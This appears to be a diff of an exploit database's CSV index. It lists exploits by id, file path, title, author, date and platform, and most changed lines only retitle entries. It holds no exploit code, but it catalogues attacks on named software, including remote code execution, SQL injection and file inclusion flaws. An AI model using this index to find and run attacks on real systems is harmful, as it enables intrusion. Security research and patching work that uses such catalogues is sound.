1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -8754,7 +8759,7 @@ id,file,description,date,author,platform,type,port
63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - GID Remote Code Execution",2003-07-25,"the itch",linux,remote,1114
64,platforms/windows/remote/64.c,"Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow",2003-07-25,Flashsky,windows,remote,135
66,platforms/windows/remote/66.c,"Microsoft Windows Server 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135
67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80
67,platforms/multiple/remote/67.c,"Apache 1.3.x (mod_mylo) - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80
69,platforms/windows/remote/69.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (1)",2003-07-29,pHrail,windows,remote,135
70,platforms/windows/remote/70.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (2)",2003-07-30,anonymous,windows,remote,135
74,platforms/linux/remote/74.c,"WU-FTPD 2.6.2 - Off-by-One Remote Command Execution",2003-08-03,Xpl017Elz,linux,remote,21
@ -8793,7 +8798,7 @@ id,file,description,date,author,platform,type,port
126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote Exploit",2003-11-20,xCrZx,linux,remote,80
127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (WebServer)",2003-11-22,nesumin,windows,remote,0
130,platforms/windows/remote/130.c,"Microsoft Windows XP - Workstation Service Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0
132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 - mod_userdir Remote Users Disclosure",2003-12-06,m00,linux,remote,80
132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 (mod_userdir) - Remote Users Disclosure",2003-12-06,m00,linux,remote,80
133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow / Denial of Service",2003-12-15,"Peter Winter-Smith",windows,remote,80
135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service - Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135
136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80
@ -8972,7 +8977,7 @@ id,file,description,date,author,platform,type,port
758,platforms/osx/remote/758.c,"Apple iTunes - Playlist Local Parsing Buffer Overflow",2005-01-16,nemo,osx,remote,0
759,platforms/windows/remote/759.cpp,"Apple iTunes - Playlist Buffer Overflow Download Shellcode Exploit",2005-01-16,ATmaCA,windows,remote,0
761,platforms/windows/remote/761.cpp,"NodeManager Professional 2.00 - Buffer Overflow",2005-01-18,"Tan Chew Keong",windows,remote,162
764,platforms/unix/remote/764.c,"Apache mod_ssl (< 2.8.7) OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)",2003-04-04,spabam,unix,remote,80
764,platforms/unix/remote/764.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)",2003-04-04,spabam,unix,remote,80
765,platforms/windows/remote/765.c,"Microsoft Internet Explorer - '.ANI' Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0
767,platforms/windows/remote/767.pl,"Golden FTP Server 2.02b - Remote Buffer Overflow",2005-01-22,Barabas,windows,remote,21
771,platforms/windows/remote/771.cpp,"Microsoft Internet Explorer - '.ANI' Downloader Exploit (MS05-002)",2005-01-24,Vertygo,windows,remote,0
@ -9964,7 +9969,7 @@ id,file,description,date,author,platform,type,port
9143,platforms/linux/remote/9143.txt,"Virtualmin < 3.703 - Multiple Local+Remote Vulnerabilities",2009-07-14,"Filip Palian",linux,remote,0
9181,platforms/windows/remote/9181.py,"Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray Exploit (1)",2009-07-17,"David Kennedy (ReL1K)",windows,remote,0
9209,platforms/hardware/remote/9209.txt,"DD-WRT HTTPd Daemon/Service - Remote Command Execution",2009-07-20,gat3way,hardware,remote,0
9214,platforms/windows/remote/9214.pl,"Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray Exploit (2)",2009-07-20,netsoul,windows,remote,0
9214,platforms/windows/remote/9214.pl,"Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray",2009-07-20,netsoul,windows,remote,0
9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet - ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0
9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 (OSX) - (Font tags) Remote Buffer Overflow",2009-07-24,Dr_IDE,osx,remote,0
9278,platforms/freebsd/remote/9278.txt,"NcFTPd 2.8.5 - Remote Jail Breakout",2009-07-27,kingcope,freebsd,remote,0
@ -10069,7 +10074,7 @@ id,file,description,date,author,platform,type,port
9966,platforms/windows/remote/9966.txt,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (1)",2009-11-02,"Nikolas Rangos",windows,remote,80
33433,platforms/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
9992,platforms/windows/remote/9992.txt,"AOL 9.1 SuperBuddy - ActiveX Control Remote code Execution",2009-10-01,Trotzkista,windows,remote,0
9993,platforms/multiple/remote/9993.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' - Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0
9993,platforms/multiple/remote/9993.txt,"Apache (mod_perl) - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0
9994,platforms/multiple/remote/9994.txt,"Apache Tomcat - Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",multiple,remote,0
9995,platforms/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication 'Username' Enumeration",2009-11-09,"D. Matscheko",multiple,remote,0
9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - '.blend' Remote Command Execution",2009-11-09,"Fernando Russ",multiple,remote,0
@ -10164,7 +10169,7 @@ id,file,description,date,author,platform,type,port
11539,platforms/windows/remote/11539.py,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow",2010-02-22,athleet,windows,remote,0
11615,platforms/win_x86/remote/11615.txt,"Microsoft Internet Explorer 6 / 7 / 8 - 'winhlp32.exe' 'MsgBox()' Remote Code Execution",2010-03-02,"Maurycy Prodeus",win_x86,remote,0
11618,platforms/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Buffer Overflow",2010-03-02,"S2 Crew",windows,remote,0
11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
11650,platforms/windows/remote/11650.c,"Apache 2.2.14 (mod_isapi) - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0
11662,platforms/multiple/remote/11662.txt,"Apache SpamAssassin Milter Plugin 0.3.1 - Remote Command Execution",2010-03-09,kingcope,multiple,remote,0
11668,platforms/windows/remote/11668.rb,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)",2010-03-09,blake,windows,remote,0
@ -10849,7 +10854,7 @@ id,file,description,date,author,platform,type,port
16779,platforms/windows/remote/16779.rb,"Now SMS/Mms Gateway - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,8800
16780,platforms/cgi/remote/16780.rb,"HP OpenView Network Node Manager - Snmp.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,cgi,remote,0
16781,platforms/windows/remote/16781.rb,"MailEnable - Authorisation Header Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,0
16782,platforms/windows/remote/16782.rb,"Apache (Windows x86) - (Windows x86) Chunked Encoding (Metasploit)",2010-07-07,Metasploit,windows,remote,0
16782,platforms/windows/remote/16782.rb,"Apache (Windows x86) - Chunked Encoding (Metasploit)",2010-07-07,Metasploit,windows,remote,0
16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Overflow Exploit (Metasploit)",2010-09-20,Metasploit,win_x86,remote,0
16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (1)",2010-11-22,Metasploit,multiple,remote,80
16785,platforms/windows/remote/16785.rb,"Hewlett-Packard (HP) Power Manager Administration - Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,80
@ -11111,7 +11116,7 @@ id,file,description,date,author,platform,type,port
17904,platforms/windows/remote/17904.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (Metasploit)",2011-09-29,otoy,windows,remote,0
17936,platforms/windows/remote/17936.rb,"Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",windows,remote,0
17948,platforms/windows/remote/17948.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (Metasploit) (2)",2011-10-09,Metasploit,windows,remote,0
17969,platforms/multiple/remote/17969.py,"Apache mod_proxy - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0
17969,platforms/multiple/remote/17969.py,"Apache (mod_proxy) - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0
17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - (SVG layout) Memory Corruption (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0
17974,platforms/windows/remote/17974.html,"Mozilla Firefox - Array.reduceRight() Integer Overflow (1)",2011-10-12,ryujin,windows,remote,0
17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0
@ -12098,7 +12103,7 @@ id,file,description,date,author,platform,type,port
21200,platforms/linux/remote/21200.c,"Net-SNMP 4.2.3 - snmpnetstat Remote Heap Overflow",2002-01-03,"Juan M. de la Torre",linux,remote,0
21201,platforms/windows/remote/21201.pl,"BrowseFTP Client 1.62 - Buffer Overflow",2002-01-04,Kanatoko,windows,remote,0
21203,platforms/windows/remote/21203.txt,"Lucent 8.x - VitalNet Password Authentication Bypass",2002-01-16,"Mark Cooper",windows,remote,0
21204,platforms/windows/remote/21204.txt,"Apache 1.3.20 - Win32 PHP.exe Remote File Disclosure",2002-01-04,"Paul Brereton",windows,remote,0
21204,platforms/windows/remote/21204.txt,"Apache 1.3.20 (Win32) - 'PHP.exe' Remote File Disclosure",2002-01-04,"Paul Brereton",windows,remote,0
21205,platforms/linux/remote/21205.c,"Boozt 0.9.8 - Buffer Overflow",2002-01-07,"Rafael San Miguel Carrasco",linux,remote,0
21207,platforms/windows/remote/21207.c,"RealPlayer 7.0/8.0 - Media File Buffer Overflow",2002-01-05,UNYUN,windows,remote,0
21210,platforms/linux/remote/21210.txt,"X-Chat 1.x - CTCP Ping Arbitrary Remote IRC Command Execution",2002-01-09,"Marcus Meissner",linux,remote,0
@ -12258,7 +12263,7 @@ id,file,description,date,author,platform,type,port
21662,platforms/windows/remote/21662.txt,"Microsoft Outlook Express 6 - XML File Attachment Script Execution",2002-07-29,http-equiv,windows,remote,0
21663,platforms/linux/remote/21663.c,"Fake Identd 0.9/1.x - Client Query Remote Buffer Overflow",2002-07-25,Jedi/Sector,linux,remote,0
21670,platforms/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 - Filename Buffer Overflow",2002-07-30,ken@FTU,windows,remote,0
21671,platforms/unix/remote/21671.c,"Apache mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' Remote Exploit (1)",2002-07-30,spabam,unix,remote,80
21671,platforms/unix/remote/21671.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit (1)",2002-07-30,spabam,unix,remote,80
40347,platforms/unix/remote/40347.txt,"Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit",2002-09-17,"Solar Eclipse",unix,remote,80
21675,platforms/windows/remote/21675.pl,"Trillian 0.x IRC Module - Buffer Overflow",2002-07-31,"John C. Hennessy",windows,remote,0
21677,platforms/solaris/remote/21677.txt,"Sun AnswerBook2 1.x - Unauthorized Administrative Script Access",2002-08-02,ghandi,solaris,remote,0
@ -13440,7 +13445,7 @@ id,file,description,date,author,platform,type,port
27606,platforms/windows/remote/27606.rb,"Intrasrv 1.0 - Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,remote,80
27607,platforms/windows/remote/27607.rb,"MiniWeb 300 - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,windows,remote,8000
27608,platforms/windows/remote/27608.rb,"Ultra Mini HTTPD - Stack Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,remote,80
27610,platforms/php/remote/27610.rb,"Joomla! Component 'com_media' - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,php,remote,80
27610,platforms/php/remote/27610.rb,"Joomla! Component Media Manager - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,php,remote,80
27611,platforms/windows/remote/27611.txt,"Oracle Java - IntegerInterleavedRaster.verify() Signed Integer Overflow",2013-08-15,"Packet Storm",windows,remote,0
27627,platforms/windows/remote/27627.txt,"Saxopress - URL Parameter Directory Traversal",2006-04-11,SecuriTeam,windows,remote,0
27630,platforms/linux/remote/27630.txt,"Plone 2.x - MembershipTool Access Control Bypass",2006-04-12,MJ0011,linux,remote,0
@ -13854,7 +13859,7 @@ id,file,description,date,author,platform,type,port
31047,platforms/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 - 'txt' Parameter Cross-Site Scripting",2008-01-22,"Jan Fry",multiple,remote,0
31050,platforms/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",multiple,remote,0
31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 - 'chrome://' URI JavaScript File Request Information Disclosure",2008-01-19,"Gerry Eisenhaur",linux,remote,0
31052,platforms/linux/remote/31052.java,"Apache 2.2.6 - 'mod_negotiation' HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0
31052,platforms/linux/remote/31052.java,"Apache 2.2.6 (mod_negotiation) - HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0
31053,platforms/php/remote/31053.php,"PHP 5.2.5 - cURL 'safe mode' Security Bypass",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
40358,platforms/linux/remote/40358.py,"LamaHub 0.0.6.2 - Buffer Overflow",2016-09-09,Pi3rrot,linux,remote,4111
@ -14674,7 +14679,7 @@ id,file,description,date,author,platform,type,port
36318,platforms/windows/remote/36318.txt,"Jetty Web Server - Directory Traversal",2011-11-18,"Alexey Sintsov",windows,remote,0
36319,platforms/windows/remote/36319.txt,"GoAhead WebServer 2.5 - 'goform/formTest' Multiple Cross-Site Scripting Vulnerabilities",2011-11-18,"Prabhu S Angadi",windows,remote,0
36337,platforms/linux/remote/36337.py,"ElasticSearch - Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200
36352,platforms/linux/remote/36352.txt,"Apache 7.0.x 'mod_proxy'- Reverse Proxy Security Bypass",2011-11-24,"Prutha Parikh",linux,remote,0
36352,platforms/linux/remote/36352.txt,"Apache 7.0.x (mod_proxy) - Reverse Proxy Security Bypass",2011-11-24,"Prutha Parikh",linux,remote,0
36360,platforms/windows/remote/36360.rb,"Adobe Flash Player - ByteArray UncompressViaZlibVariant Use-After-Free (Metasploit)",2015-03-12,Metasploit,windows,remote,0
36370,platforms/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload / Code Execution",2015-03-13,"Horoszkiewicz Julian ISP_",linux,remote,0
36376,platforms/windows/remote/36376.txt,"Oxide WebServer - Directory Traversal",2011-11-29,demonalex,windows,remote,0
@ -14717,7 +14722,7 @@ id,file,description,date,author,platform,type,port
36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 - Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
36652,platforms/multiple/remote/36652.py,"w3tw0rk / Pitbull Perl IRC Bot - Remote Code Execution (PoC)",2015-04-06,"Jay Turla",multiple,remote,6667
36653,platforms/jsp/remote/36653.rb,"JBoss Seam 2 - Arbitrary File Upload / Execution (Metasploit)",2015-04-06,Metasploit,jsp,remote,8080
36663,platforms/linux/remote/36663.txt,"Apache 2.2.15 - 'mod_proxy' Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote,0
36663,platforms/linux/remote/36663.txt,"Apache 2.2.15 (mod_proxy) - Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote,0
36670,platforms/hardware/remote/36670.txt,"D-Link ShareCenter Products - Multiple Remote Code Execution Vulnerabilities",2012-02-08,"Roberto Paleari",hardware,remote,0
36679,platforms/windows/remote/36679.rb,"SolarWinds Firewall Security Manager 6.6.5 - Client Session Handling (Metasploit)",2015-04-08,Metasploit,windows,remote,0
36680,platforms/hardware/remote/36680.txt,"Multiple Trendnet Camera Products - Remote Security Bypass",2012-02-10,console-cowboys,hardware,remote,0
@ -15006,7 +15011,7 @@ id,file,description,date,author,platform,type,port
39186,platforms/multiple/remote/39186.pl,"UPS Web/SNMP-Manager CS121 - Authentication Bypass",2014-05-15,jkmac,multiple,remote,0
39194,platforms/hardware/remote/39194.txt,"AVM FRITZ!Box < 6.30 - Buffer Overflow",2016-01-07,"RedTeam Pentesting",hardware,remote,0
39195,platforms/hardware/remote/39195.c,"Foscam IP Camera - Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",hardware,remote,0
39196,platforms/linux/remote/39196.py,"Apache 'mod_wsgi' Module - Information Disclosure",2014-05-21,"Buck Golemon",linux,remote,0
39196,platforms/linux/remote/39196.py,"Apache (mod_wsgi) - Information Disclosure",2014-05-21,"Buck Golemon",linux,remote,0
39205,platforms/multiple/remote/39205.txt,"Castor Library - XML External Entity Information Disclosure",2014-05-27,"Ron Gutierrez",multiple,remote,0
39209,platforms/hardware/remote/39209.txt,"Huawei E303 Router - Cross-Site Request Forgery",2014-05-30,"Benjamin Daniel Mussler",hardware,remote,0
39215,platforms/windows/remote/39215.py,"Konica Minolta FTP Utility 1.00 - CWD Command SEH Overflow",2016-01-11,TOMIWA,windows,remote,21
@ -22766,7 +22771,7 @@ id,file,description,date,author,platform,type,port
12031,platforms/php/webapps/12031.html,"Advanced Management For Services Sites - Remote Add Admin",2010-04-03,alnjm33,php,webapps,0
12034,platforms/php/webapps/12034.txt,"Flatpress 0.909.1 - Persistent Cross-Site Scripting",2010-04-03,ITSecTeam,php,webapps,0
12036,platforms/hardware/webapps/12036.txt,"Edimax AR-7084GA Router - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2010-04-03,l3D,hardware,webapps,0
12037,platforms/php/webapps/12037.txt,"Joomla! Component 'com_jp_jobs' 1.4.1 - SQL Injection",2010-04-03,Valentin,php,webapps,0
12037,platforms/php/webapps/12037.txt,"Joomla! Component JP Jobs 1.4.1 - SQL Injection",2010-04-03,Valentin,php,webapps,0
12038,platforms/php/webapps/12038.txt,"Advanced Management For Services Sites - Bypass Create And Download SQL Backup",2010-04-04,indoushka,php,webapps,0
12039,platforms/multiple/webapps/12039.txt,"QuickEStore 6.1 - Backup Dump",2010-04-04,indoushka,multiple,webapps,0
12041,platforms/php/webapps/12041.txt,"Solutive CMS - SQL Injection",2010-04-04,"Th3 RDX",php,webapps,0
@ -22782,28 +22787,28 @@ id,file,description,date,author,platform,type,port
12055,platforms/php/webapps/12055.txt,"Joomla! Component 'com_redtwitter' 1.0 - Local File Inclusion",2010-04-04,NoGe,php,webapps,0
12056,platforms/php/webapps/12056.txt,"Joomla! Component 'com_wisroyq' 1.1 - Local File Inclusion",2010-04-04,NoGe,php,webapps,0
12057,platforms/php/webapps/12057.txt,"Joomla! Component 'com_press' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
12058,platforms/php/webapps/12058.txt,"Joomla! Component 'com_joomlapicasa' 2.0 - Local File Inclusion",2010-04-04,Vrs-hCk,php,webapps,0
12058,platforms/php/webapps/12058.txt,"Joomla! Component Picasa 2.0 - Local File Inclusion",2010-04-04,Vrs-hCk,php,webapps,0
12060,platforms/php/webapps/12060.txt,"Joomla! Component 'com_serie' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
12061,platforms/php/webapps/12061.txt,"Facil-CMS 0.1RC2 - Local / Remote File Inclusion",2010-04-04,eidelweiss,php,webapps,0
12062,platforms/php/webapps/12062.txt,"Joomla! Component 'com_ranking' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
12065,platforms/php/webapps/12065.txt,"Joomla! Component 'com_jinventory' - Local File Inclusion",2010-04-05,"Chip d3 bi0s",php,webapps,0
12065,platforms/php/webapps/12065.txt,"Joomla! Component JInventory 1.23.02 - Local File Inclusion",2010-04-05,"Chip d3 bi0s",php,webapps,0
12066,platforms/php/webapps/12066.txt,"Joomla! Component 'com_svmap' 1.1.1 - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
12067,platforms/php/webapps/12067.txt,"Joomla! Component 'com_shoutbox' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
12068,platforms/php/webapps/12068.txt,"Joomla! Component 'com_loginbox' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
12068,platforms/php/webapps/12068.txt,"Joomla! Component LoginBox - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
12069,platforms/php/webapps/12069.txt,"Joomla! Component 'com_bca-rss-syndicator' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
12070,platforms/php/webapps/12070.txt,"Joomla! Component 'com_Joomlaupdater' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
12070,platforms/php/webapps/12070.txt,"Joomla! Component Magic Updater - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
12071,platforms/php/webapps/12071.txt,"jevoncms - (Local File Inclusion / Remote File Inclusion) Multiple Vulnerabilities",2010-04-05,eidelweiss,php,webapps,0
12075,platforms/php/webapps/12075.txt,"LionWiki 3.x - 'index.php' Arbitrary File Upload",2010-04-05,ayastar,php,webapps,0
12076,platforms/php/webapps/12076.pl,"ilchClan 1.0.5 - 'cid' SQL Injection",2010-04-05,"Easy Laster",php,webapps,0
12077,platforms/php/webapps/12077.txt,"Joomla! Component 'com_news_portal' 1.5.x - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12078,platforms/php/webapps/12078.txt,"Joomla! Component 'com_fss' 1.3 - 'faqid' Parameter SQL Injection",2010-04-06,"Chip d3 bi0s",php,webapps,0
12077,platforms/php/webapps/12077.txt,"Joomla! Component News Portal 1.5.x - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12078,platforms/php/webapps/12078.txt,"Joomla! Component Freestyle FAQ Lite 1.3 - 'faqid' Parameter SQL Injection",2010-04-06,"Chip d3 bi0s",php,webapps,0
12082,platforms/php/webapps/12082.txt,"Joomla! Component 'com_sebercart' 1.0.0.12 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12083,platforms/php/webapps/12083.txt,"Joomla! Component 'com_jwhmcs' 1.5.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12084,platforms/php/webapps/12084.txt,"Joomla! Component 'com_jukebox' 1.7 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12085,platforms/php/webapps/12085.txt,"Joomla! Component 'com_Joomlaflickr' 1.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12086,platforms/php/webapps/12086.txt,"Joomla! Component 'com_hsconfig' 1.5 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12087,platforms/php/webapps/12087.txt,"Joomla! Component 'com_fabrik' 2.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12088,platforms/php/webapps/12088.txt,"Joomla! Component 'com_datafeeds' 880 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12083,platforms/php/webapps/12083.txt,"Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12084,platforms/php/webapps/12084.txt,"Joomla! Component Juke Box 1.7 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12085,platforms/php/webapps/12085.txt,"Joomla! Component Joomla Flickr 1.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12086,platforms/php/webapps/12086.txt,"Joomla! Component Highslide 1.5 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12087,platforms/php/webapps/12087.txt,"Joomla! Component Fabrik 2.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12088,platforms/php/webapps/12088.txt,"Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12089,platforms/php/webapps/12089.txt,"Joomla! Component 'com_appointment' 1.5 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
12092,platforms/hardware/webapps/12092.txt,"McAfee Email Gateway (formerly IronMail) - Cross-Site Scripting",2010-04-06,"Nahuel Grisolia",hardware,webapps,0
12094,platforms/php/webapps/12094.txt,"ShopSystem - SQL Injection",2010-04-06,Valentin,php,webapps,0
@ -22821,8 +22826,8 @@ id,file,description,date,author,platform,type,port
12113,platforms/php/webapps/12113.txt,"Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0
12115,platforms/php/webapps/12115.txt,"Kubeit CMS - SQL Injection",2010-04-08,Phenom,php,webapps,0
12118,platforms/php/webapps/12118.txt,"Joomla! Component 'com_powermail' 1.5.3 - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0
12120,platforms/php/webapps/12120.txt,"Joomla! Component 'com_foobla_suggestions' 1.5.1.2 - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0
12121,platforms/php/webapps/12121.txt,"Joomla! Component 'com_javoice' - Local File Inclusion",2010-04-09,kaMtiEz,php,webapps,0
12120,platforms/php/webapps/12120.txt,"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0
12121,platforms/php/webapps/12121.txt,"Joomla! Component JA Voice 2.0 - Local File Inclusion",2010-04-09,kaMtiEz,php,webapps,0
12123,platforms/php/webapps/12123.txt,"Joomla! Component 'com_pcchess' - Local File Inclusion",2010-04-09,team_elite,php,webapps,0
12124,platforms/php/webapps/12124.txt,"Joomla! Component 'com_huruhelpdesk' - SQL Injection",2010-04-09,bumble_be,php,webapps,0
12128,platforms/php/webapps/12128.txt,"GarageSales - Arbitrary File Upload",2010-04-09,saidinh0,php,webapps,0
@ -22839,8 +22844,8 @@ id,file,description,date,author,platform,type,port
12142,platforms/php/webapps/12142.txt,"Joomla! Component 'com_tweetla' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12143,platforms/php/webapps/12143.txt,"Joomla! Component 'com_ticketbook' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12144,platforms/php/webapps/12144.txt,"Joomla! Component 'com_jajobboard' - Multiple Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12145,platforms/php/webapps/12145.txt,"Joomla! Component 'com_jfeedback' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12146,platforms/php/webapps/12146.txt,"Joomla! Component 'com_jprojectmanager' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12145,platforms/php/webapps/12145.txt,"Joomla! Component Jfeedback 1.2 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12146,platforms/php/webapps/12146.txt,"Joomla! Component JProject Manager 1.0 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12147,platforms/php/webapps/12147.txt,"Joomla! Component 'com_preventive' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
12148,platforms/php/webapps/12148.txt,"Joomla! Component 'com_rokmodule' - 'moduleid' Parameter Blind SQL Injection",2010-04-11,AntiSecurity,php,webapps,0
12149,platforms/php/webapps/12149.txt,"Joomla! Component 'com_spsnewsletter' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0
@ -22850,13 +22855,13 @@ id,file,description,date,author,platform,type,port
12155,platforms/php/webapps/12155.txt,"AuroraGPT 4.0 - Remote Code Execution",2010-04-11,"Amoo Arash",php,webapps,0
12157,platforms/php/webapps/12157.txt,"OnePC mySite Management Software - SQL Injection",2010-04-11,Valentin,php,webapps,0
